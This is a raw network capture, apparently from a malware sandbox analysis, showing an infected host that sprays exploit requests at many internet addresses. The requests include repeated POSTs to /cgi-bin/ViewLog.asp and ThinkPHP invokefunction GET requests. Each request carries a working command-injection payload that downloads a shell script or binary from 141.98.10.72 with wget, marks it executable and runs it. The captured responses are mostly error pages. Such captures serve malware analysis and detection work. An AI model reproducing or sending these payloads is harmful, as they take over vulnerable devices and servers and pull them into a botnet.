                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        266192.168.2.145109294.120.10.2318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.251535892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        267192.168.2.145597894.69.227.2468080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.254008055 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:28.504662991 CET490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:33:29 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        268192.168.2.143619294.122.51.28080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.258697033 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        269192.168.2.145422262.29.90.1098080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.260057926 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        270192.168.2.145838895.86.123.1158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.266009092 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        271192.168.2.143900894.46.168.798080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.405895948 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:28.619992971 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:33:28 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        272192.168.2.144880294.229.231.588080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.469248056 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:28.752731085 CET363INHTTP/1.1 403 Forbidden
                                                        Server: Web server
                                                        Date: Wed, 14 Feb 2024 08:33:25 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 151
                                                        Connection: keep-alive
                                                        X-Detail: 0x1210, insufficient security level
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        273192.168.2.144222894.120.253.1748080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.477921009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        274192.168.2.1449280119.201.85.10323
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.517183065 CET179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 37 3a 33 33 3a 33 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 17:33:31Auth Result: Invalid user.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        275192.168.2.1449346119.201.85.10323
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:29.092986107 CET179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 37 3a 33 33 3a 33 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 17:33:31Auth Result: Invalid user.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        276192.168.2.145213095.173.172.15880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:29.438612938 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:29.691659927 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:33:35 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        277192.168.2.145664295.141.118.16280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:29.639951944 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:29.917602062 CET571INHTTP/1.1 404 FILE NOT FOUND
                                                        Content-type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 58 66 6c 6f 77 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 73 63 72 69 70 74 2f 6a 51 75 65 72 79 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 73 63 72 69 70 74 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 73 63 72 69 70 74 2f 69 68 6d 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 64 6f 63 75 6d 65 6e 74 2e 73 65 73 73 69 6f 6e 69 64 20 3d 20 22 3c 25 73 65 73 73 69 6f 6e 69 64 3e 22 3b 0d 0a 09 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 20 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 09 09 74 72 61 6e 73 6c 61 74 65 28 29 3b 0d 0a 09 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0d 0a 09 3c 48 31 3e 3c 73 70 61 6e 20 69 64 3d 22 64 69 63 6f 5f 37 39 39 22 3e 70 61 67 65 20 69 6e 74 72 6f 75 76 61 62 6c 65 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>Xflow</title><script language="javascript" src="script/jQuery/jquery.min.js"></script><script language="javascript" src="script/jquery/jquery.cookie.js"></script><script language="javascript" src="script/ihm.js"></script><script language="javascript">document.sessionid = "<%sessionid>";$(document).ready ( function() {translate();});</script></head><body style="display:none"><H1><span id="dico_799">page introuvable</span></h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        278192.168.2.143556895.100.71.6380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:29.640737057 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:29.843142986 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:29 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:29 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 37 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 36 30 39 26 23 34 36 3b 32 62 62 39 34 36 64 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b77a7b5c&#46;1707899609&#46;2bb946d8</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        279192.168.2.1449356119.201.85.10323
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:29.663809061 CET179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 37 3a 33 33 3a 33 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 17:33:32Auth Result: Invalid user.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        280192.168.2.143673895.100.219.5180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:30.002042055 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:30.363306046 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
